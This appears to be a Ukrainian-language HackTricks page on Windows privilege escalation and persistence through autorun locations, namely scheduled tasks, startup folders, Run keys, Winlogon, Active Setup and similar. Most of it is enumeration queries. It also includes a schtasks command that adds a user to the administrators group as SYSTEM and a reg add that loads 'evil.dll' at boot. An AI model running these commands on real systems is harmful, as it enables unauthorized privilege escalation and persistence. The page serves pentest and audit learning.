29 KiB
Підвищення привілеїв за допомогою Autoruns
{% hint style="success" %}
Вивчайте та практикуйте AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking:  HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training GCP Red Team Expert (GRTE)
Підтримайте HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи Telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
- Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на GitHub.
Порада для баг-баунті: зареєструйтесь на Intigriti, преміум платформі для баг-баунті, створеній хакерами для хакерів! Приєднуйтесь до нас на https://go.intigriti.com/hacktricks сьогодні та почніть заробляти винагороди до $100,000!
{% embed url="https://go.intigriti.com/hacktricks" %}
WMIC
Wmic можна використовувати для запуску програм при завантаженні. Дивіться, які бінарні файли заплановані для запуску при завантаженні:
wmic startup get caption,command 2>nul & ^
Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl
Заплановані завдання
Завдання можуть бути заплановані для виконання з певною частотою. Перегляньте, які бінарні файли заплановані для виконання за допомогою:
schtasks /query /fo TABLE /nh | findstr /v /i "disable deshab"
schtasks /query /fo LIST 2>nul | findstr TaskName
schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
#Schtask to give admin access
#You can also write that content on a bat file that is being executed by a scheduled task
schtasks /Create /RU "SYSTEM" /SC ONLOGON /TN "SchedPE" /TR "cmd /c net localgroup administrators user /add"
Folders
Всі бінарні файли, розташовані в папках автозапуску, будуть виконані під час запуску. Загальні папки автозапуску наведені далі, але папка автозапуску вказується в реєстрі. Прочитайте це, щоб дізнатися де.
dir /b "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" 2>nul
dir /b "C:\Documents and Settings\%username%\Start Menu\Programs\Startup" 2>nul
dir /b "%programdata%\Microsoft\Windows\Start Menu\Programs\Startup" 2>nul
dir /b "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" 2>nul
Get-ChildItem "C:\Users\All Users\Start Menu\Programs\Startup"
Get-ChildItem "C:\Users\$env:USERNAME\Start Menu\Programs\Startup"
Реєстр
{% hint style="info" %} Примітка звідси: Запис реєстру Wow6432Node вказує на те, що ви використовуєте 64-бітну версію Windows. Операційна система використовує цей ключ для відображення окремого вигляду HKEY_LOCAL_MACHINE\SOFTWARE для 32-бітних додатків, які працюють на 64-бітних версіях Windows. {% endhint %}
Запуски
Зазвичай відомі реєстраційні ключі AutoRun:
HKLM\Software\Microsoft\Windows\CurrentVersion\RunHKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceHKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunHKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnceHKCU\Software\Microsoft\Windows\CurrentVersion\RunHKCU\Software\Microsoft\Windows\CurrentVersion\RunOnceHKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunHKCU\Software\Wow6432Npde\Microsoft\Windows\CurrentVersion\RunOnceHKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunHKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunonceHKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunonceEx
Реєстраційні ключі, відомі як Run і RunOnce, призначені для автоматичного виконання програм щоразу, коли користувач входить у систему. Командний рядок, призначений як значення даних ключа, обмежений 260 символами або менше.
Запуски служб (можуть контролювати автоматичний запуск служб під час завантаження):
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnceHKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnceHKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesHKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesHKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnceHKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnceHKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesHKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServices
RunOnceEx:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceExHKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnceEx
У Windows Vista та пізніших версіях реєстраційні ключі Run і RunOnce не генеруються автоматично. Записи в цих ключах можуть або безпосередньо запускати програми, або вказувати їх як залежності. Наприклад, щоб завантажити файл DLL під час входу в систему, можна використовувати реєстраційний ключ RunOnceEx разом з ключем "Depend". Це демонструється шляхом додавання запису реєстру для виконання "C:\temp\evil.dll" під час завантаження системи:
reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d "C:\\temp\\evil.dll"
{% hint style="info" %} Exploit 1: Якщо ви можете записувати в будь-який з вказаних реєстрів всередині HKLM, ви можете підвищити привілеї, коли інший користувач входить в систему. {% endhint %}
{% hint style="info" %} Exploit 2: Якщо ви можете перезаписати будь-які з бінарних файлів, вказаних у будь-якому з реєстрів всередині HKLM, ви можете модифікувати цей бінарний файл з бекдором, коли інший користувач входить в систему, і підвищити привілеї. {% endhint %}
#CMD
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunE
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
reg query HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServices
reg query HKCU\Software\Wow5432Node\Microsoft\Windows\CurrentVersion\RunServices
reg query HKLM\Software\Microsoft\Windows\RunOnceEx
reg query HKLM\Software\Wow6432Node\Microsoft\Windows\RunOnceEx
reg query HKCU\Software\Microsoft\Windows\RunOnceEx
reg query HKCU\Software\Wow6432Node\Microsoft\Windows\RunOnceEx
#PowerShell
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\CurrentVersion\Run'
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce'
Get-ItemProperty -Path 'Registry::HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run'
Get-ItemProperty -Path 'Registry::HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce'
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Run'
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce'
Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run'
Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce'
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run'
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunOnce'
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\RunE'
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce'
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce'
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices'
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices'
Get-ItemProperty -Path 'Registry::HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce'
Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServicesOnce'
Get-ItemProperty -Path 'Registry::HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServices'
Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunServices'
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\RunOnceEx'
Get-ItemProperty -Path 'Registry::HKLM\Software\Wow6432Node\Microsoft\Windows\RunOnceEx'
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\RunOnceEx'
Get-ItemProperty -Path 'Registry::HKCU\Software\Wow6432Node\Microsoft\Windows\RunOnceEx'
Startup Path
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell FoldersHKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell FoldersHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell FoldersHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Ярлики, розміщені в папці Startup, автоматично запускають служби або програми під час входу користувача в систему або перезавантаження системи. Місцезнаходження папки Startup визначається в реєстрі для обох областей Local Machine та Current User. Це означає, що будь-який ярлик, доданий до цих вказаних місць Startup, забезпечить запуск пов'язаної служби або програми після процесу входу або перезавантаження, що робить це простим методом для планування автоматичного запуску програм.
{% hint style="info" %} Якщо ви зможете перезаписати будь-яку [User] Shell Folder під HKLM, ви зможете вказати її на папку, контрольовану вами, і розмістити бекдор, який буде виконуватись щоразу, коли користувач входить у систему, підвищуючи привілеї. {% endhint %}
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v "Common Startup"
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v "Common Startup"
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v "Common Startup"
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v "Common Startup"
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' -Name "Common Startup"
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders' -Name "Common Startup"
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders' -Name "Common Startup"
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' -Name "Common Startup"
Winlogon Keys
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Зазвичай, ключ Userinit встановлений на userinit.exe. Однак, якщо цей ключ змінено, вказаний виконуваний файл також буде запущений Winlogon під час входу користувача. Аналогічно, ключ Shell призначений для вказівки на explorer.exe, який є стандартною оболонкою для Windows.
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Userinit"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell"
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -Name "Userinit"
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -Name "Shell"
{% hint style="info" %} Якщо ви зможете перезаписати значення реєстру або двійковий файл, ви зможете підвищити привілеї. {% endhint %}
Налаштування політики
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\ExplorerHKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Перевірте ключ Run.
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "Run"
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "Run"
Get-ItemProperty -Path 'Registry::HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer' -Name "Run"
Get-ItemProperty -Path 'Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer' -Name "Run"
AlternateShell
Зміна командного рядка безпечного режиму
У реєстрі Windows за адресою HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot є значення AlternateShell, яке за замовчуванням встановлено на cmd.exe. Це означає, що коли ви вибираєте "Безпечний режим з командним рядком" під час завантаження (натискаючи F8), використовується cmd.exe. Але можливо налаштувати ваш комп'ютер на автоматичний запуск у цьому режимі без необхідності натискати F8 і вручну вибирати його.
Кроки для створення параметра завантаження для автоматичного запуску в "Безпечному режимі з командним рядком":
- Змінити атрибути файлу
boot.ini, щоб видалити прапори тільки для читання, системний і прихований:attrib c:\boot.ini -r -s -h - Відкрити
boot.iniдля редагування. - Вставити рядок, наприклад:
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect /SAFEBOOT:MINIMAL(ALTERNATESHELL) - Зберегти зміни в
boot.ini. - Знову застосувати початкові атрибути файлу:
attrib c:\boot.ini +r +s +h
- Exploit 1: Зміна ключа реєстру AlternateShell дозволяє налаштувати власну командну оболонку, що потенційно може призвести до несанкціонованого доступу.
- Exploit 2 (Права на запис у PATH): Наявність прав на запис у будь-яку частину системної змінної PATH, особливо перед
C:\Windows\system32, дозволяє виконувати власнийcmd.exe, що може бути бекдором, якщо система запущена в безпечному режимі. - Exploit 3 (Права на запис у PATH і boot.ini): Доступ до запису в
boot.iniдозволяє автоматичний запуск у безпечному режимі, що полегшує несанкціонований доступ при наступному перезавантаженні.
Щоб перевірити поточне налаштування AlternateShell, використовуйте ці команди:
reg query HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot /v AlternateShell
Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot' -Name 'AlternateShell'
Встановлений компонент
Active Setup — це функція в Windows, яка ініціюється до повного завантаження робочого середовища. Вона пріоритетно виконує певні команди, які повинні завершитися перед продовженням входу користувача. Цей процес відбувається навіть до того, як будуть активовані інші записи автозавантаження, такі як ті, що в розділах реєстру Run або RunOnce.
Active Setup керується через наступні ключі реєстру:
HKLM\SOFTWARE\Microsoft\Active Setup\Installed ComponentsHKLM\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed ComponentsHKCU\SOFTWARE\Microsoft\Active Setup\Installed ComponentsHKCU\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components
У цих ключах існують різні підключі, кожен з яких відповідає конкретному компоненту. Ключові значення, які представляють особливий інтерес, включають:
- IsInstalled:
0вказує, що команда компонента не буде виконана.1означає, що команда буде виконана один раз для кожного користувача, що є поведінкою за замовчуванням, якщо значенняIsInstalledвідсутнє.- StubPath: Визначає команду, яка буде виконана Active Setup. Це може бути будь-яка дійсна командний рядок, наприклад, запуск
notepad.
Інсайти безпеки:
- Модифікація або запис у ключ, де
IsInstalledвстановлено на"1"з конкретнимStubPath, може призвести до несанкціонованого виконання команд, потенційно для підвищення привілеїв. - Зміна бінарного файлу, на який посилається будь-яке значення
StubPath, також може досягти підвищення привілеїв, за умови достатніх дозволів.
Щоб перевірити конфігурації StubPath у компонентах Active Setup, можна використовувати ці команди:
reg query "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components" /s /v StubPath
reg query "HKCU\SOFTWARE\Microsoft\Active Setup\Installed Components" /s /v StubPath
reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components" /s /v StubPath
reg query "HKCU\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components" /s /v StubPath
Browser Helper Objects
Overview of Browser Helper Objects (BHOs)
Browser Helper Objects (BHOs) - це модулі DLL, які додають додаткові функції до Internet Explorer від Microsoft. Вони завантажуються в Internet Explorer та Windows Explorer при кожному запуску. Однак їх виконання можна заблокувати, встановивши ключ NoExplorer на 1, що запобігає їх завантаженню з екземплярами Windows Explorer.
BHOs сумісні з Windows 10 через Internet Explorer 11, але не підтримуються в Microsoft Edge, браузері за замовчуванням у новіших версіях Windows.
Щоб дослідити BHOs, зареєстровані в системі, ви можете перевірити наступні ключі реєстру:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper ObjectsHKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
Кожен BHO представлений своїм CLSID у реєстрі, що слугує унікальним ідентифікатором. Докладну інформацію про кожен CLSID можна знайти під HKLM\SOFTWARE\Classes\CLSID\{<CLSID>}.
Для запиту BHOs у реєстрі можна використовувати ці команди:
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects" /s
reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects" /s
Розширення Internet Explorer
HKLM\Software\Microsoft\Internet Explorer\ExtensionsHKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions
Зверніть увагу, що реєстр міститиме 1 новий запис реєстру для кожного dll, і він буде представлений CLSID. Ви можете знайти інформацію про CLSID у HKLM\SOFTWARE\Classes\CLSID\{<CLSID>}
Драйвери шрифтів
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Font DriversHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Font Drivers
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Font Drivers"
reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Font Drivers"
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Font Drivers'
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Font Drivers'
Open Command
HKLM\SOFTWARE\Classes\htmlfile\shell\open\commandHKLM\SOFTWARE\Wow6432Node\Classes\htmlfile\shell\open\command
reg query "HKLM\SOFTWARE\Classes\htmlfile\shell\open\command" /v ""
reg query "HKLM\SOFTWARE\Wow6432Node\Classes\htmlfile\shell\open\command" /v ""
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Classes\htmlfile\shell\open\command' -Name ""
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Wow6432Node\Classes\htmlfile\shell\open\command' -Name ""
Опції виконання файлів зображень
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
HKLM\Software\Microsoft\Wow6432Node\Windows NT\CurrentVersion\Image File Execution Options
SysInternals
Зверніть увагу, що всі сайти, де ви можете знайти autoruns, вже були перевірені winpeas.exe. Однак для більш повного списку автоматично виконуваних файлів ви можете використовувати autoruns від sysinternals:
autorunsc.exe -m -nobanner -a * -ct /accepteula
More
Знайдіть більше Autoruns, таких як реєстрації, на https://www.microsoftpressstore.com/articles/article.aspx?p=2762082&seqNum=2
References
- https://resources.infosecinstitute.com/common-malware-persistence-mechanisms/#gref
- https://attack.mitre.org/techniques/T1547/001/
- https://www.microsoftpressstore.com/articles/article.aspx?p=2762082&seqNum=2
- https://www.itprotoday.com/cloud-computing/how-can-i-add-boot-option-starts-alternate-shell
Bug bounty tip: зареєструйтесь на Intigriti, преміум платформі для bug bounty, створеній хакерами для хакерів! Приєднуйтесь до нас на https://go.intigriti.com/hacktricks сьогодні та почніть заробляти винагороди до $100,000!
{% embed url="https://go.intigriti.com/hacktricks" %}
{% hint style="success" %}
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking:  HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.